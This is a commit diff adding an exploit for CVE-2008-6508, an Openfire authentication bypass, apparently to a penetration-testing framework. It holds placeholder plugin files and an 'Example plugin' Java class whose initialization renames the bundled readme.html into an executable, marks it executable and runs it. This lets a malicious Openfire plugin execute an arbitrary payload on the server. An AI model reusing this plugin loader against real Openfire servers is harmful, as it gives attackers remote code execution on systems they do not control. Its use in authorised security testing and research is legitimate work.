added Exploit for CVE-2008-6508 (Openfire Auth bypass)

data/exploits/CVE-2008-6508/META-INF/MANIFEST.MF

@@ -0,0 +1,4 @@
+Manifest-Version: 1.0
+Ant-Version: Apache Ant 1.6.4
+Created-By: 20.0-b11 (Sun Microsystems Inc.)
+

data/exploits/CVE-2008-6508/changelog.html

@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin changelog</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add changelog content here
+</p>
+</body>
+</html>

data/exploits/CVE-2008-6508/plugin.xml

@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<plugin>
+   <class>com.example.openfire.plugin.Example</class>
+   <name>PLUGINNAME</name>
+   <description>PLUGINDESCRIPTION</description>
+   <author>PLUGINAUTHOR</author>
+   <version>0.0.1</version>
+   <date>7/7/2008</date>
+   <minServerVersion>3.5.0</minServerVersion>
+</plugin>

data/exploits/CVE-2008-6508/readme.html

@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add readme content here
+</p>
+</body>
+</html>

external/source/exploits/CVE-2008-6508/Example.java

@@ -0,0 +1,55 @@
+package com.example.openfire.plugin;
+
+import java.io.*;
+import java.util.TimerTask;
+
+import org.jivesoftware.util.JiveGlobals;
+import org.jivesoftware.openfire.container.Plugin;
+import org.jivesoftware.openfire.container.PluginManager;
+
+import org.jivesoftware.util.JiveGlobals;
+import org.jivesoftware.util.Log;
+import org.jivesoftware.util.TaskEngine;
+
+public class Example implements Plugin {
+	private static final String OS_NAME = System.getProperty("os.name").toLowerCase();
+	private static final String PATH_SEP = System.getProperty("path.separator");
+	private static final boolean IS_AIX = "aix".equals(OS_NAME);
+	private static final boolean IS_DOS = PATH_SEP.equals(";");
+	private static final String JAVA_HOME = System.getProperty("java.home");
+	private static final String CURRENT_DIR = System.getProperty("user.dir");
+
+	public void initializePlugin(PluginManager manager, File pluginDirectory) {
+		try{
+
+			// Try to rename the existing file, according
+			String readmeFile = pluginDirectory.getCanonicalPath().toString() + "/" + "readme.html";
+			String exeFile = pluginDirectory.getCanonicalPath().toString() + "/" + pluginDirectory.getName();
+
+			if (IS_DOS)
+			{
+				exeFile += ".exe";
+			}
+
+			File file = new File(readmeFile);
+			File file2 = new File(exeFile);
+
+			file.renameTo(file2);		
+
+			if (!IS_DOS) {
+		        file2.setExecutable(true);	
+			}
+
+			Runtime.getRuntime().exec(new String[] { exeFile });
+
+		}
+		catch (Exception ex)
+		{
+			Log.error("error", ex);  
+		}  
+   }
+
+   public void destroyPlugin() {
+
+   }
+}